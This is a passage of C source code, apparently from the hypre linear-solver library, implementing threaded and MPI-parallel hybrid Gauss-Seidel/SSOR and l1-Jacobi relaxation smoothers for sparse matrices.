for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
hypre_TFree(tmp_data, HYPRE_MEMORY_HOST);
}
else
{
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 6: /* Hybrid: Jacobi off-processor,
Symm. Gauss-Seidel/ SSOR on-processor
with outer relaxation parameter */
{
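         /*-----------------------------------------------------------------
          * Symmetric hybrid Gauss-Seidel/SSOR: each thread block performs
          * a forward sweep (i = ns, ..., ne-1) immediately followed by a
          * backward sweep (i = ne-1, ..., ns), with Jacobi-style coupling
          * across thread-block and processor boundaries.
          *-----------------------------------------------------------------*/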
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
         /*-----------------------------------------------------------------
          * Exchange off-processor boundary values of u with the
          * neighboring processes.
          *-----------------------------------------------------------------*/
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
v_buf_data[index++]
= u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data,
Vext_data);
            /*-----------------------------------------------------------------
             * Complete the halo exchange so that Vext_data holds the
             * off-processor values of u.
             *-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,res0,res2,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,res0,res2,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 7: /* Jacobi (uses ParMatvec) */
{
/*-----------------------------------------------------------------
* Copy f into temporary vector.
*-----------------------------------------------------------------*/
hypre_SeqVectorPrefetch(hypre_ParVectorLocalVector(Vtemp), HYPRE_MEMORY_DEVICE);
hypre_SeqVectorPrefetch(hypre_ParVectorLocalVector(f), HYPRE_MEMORY_DEVICE);
hypre_ParVectorCopy(f, Vtemp);
         /*-----------------------------------------------------------------
          * Perform Matvec: Vtemp = relax_weight * (f - A*u)
          *-----------------------------------------------------------------*/
hypre_ParCSRMatrixMatvec(-relax_weight,A, u, relax_weight, Vtemp);
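         /*-----------------------------------------------------------------
          * The update below, u_i += Vtemp_i / l1_norms[i], is a weighted
          * Jacobi step in which the diagonal A_ii is replaced by
          * l1_norms[i] (typically the l1 norm of row i), which keeps the
          * smoother convergent for SPD matrices.
          *-----------------------------------------------------------------*/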
#if defined(HYPRE_USING_CUDA)
hypreDevice_IVAXPY(n, l1_norms, Vtemp_data, u_data);
#else
for (i = 0; i < n; i++)
{
            /*-----------------------------------------------------------
             * l1-Jacobi update; l1_norms[i] is assumed to be nonzero.
             *-----------------------------------------------------------*/
u_data[i] += Vtemp_data[i] / l1_norms[i];
}
#endif
}
break;
case 8: /* hybrid L1 Symm. Gauss-Seidel */
{
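         /*-----------------------------------------------------------------
          * L1 variant of the symmetric hybrid Gauss-Seidel sweep: the
          * structure matches relax_type = 6, but each update divides by
          * l1_norms[i] instead of the diagonal, and the diagonal loop
          * starts at A_diag_i[i] (including the diagonal term in the
          * residual) so that the additive update u_i += res / l1_norms[i]
          * is consistent.
          *-----------------------------------------------------------------*/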
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
         /*-----------------------------------------------------------------
          * Exchange off-processor boundary values of u with the
          * neighboring processes.
          *-----------------------------------------------------------------*/
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
{
v_buf_data[index++] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
            /*-----------------------------------------------------------------
             * Complete the halo exchange so that Vext_data holds the
             * off-processor values of u.
             *-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
{
res -= A_diag_data[jj] * tmp_data[ii];
}
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
{
res -= A_diag_data[jj] * tmp_data[ii];
}
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
{
res -= A_diag_data[jj] * tmp_data[ii];
}
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
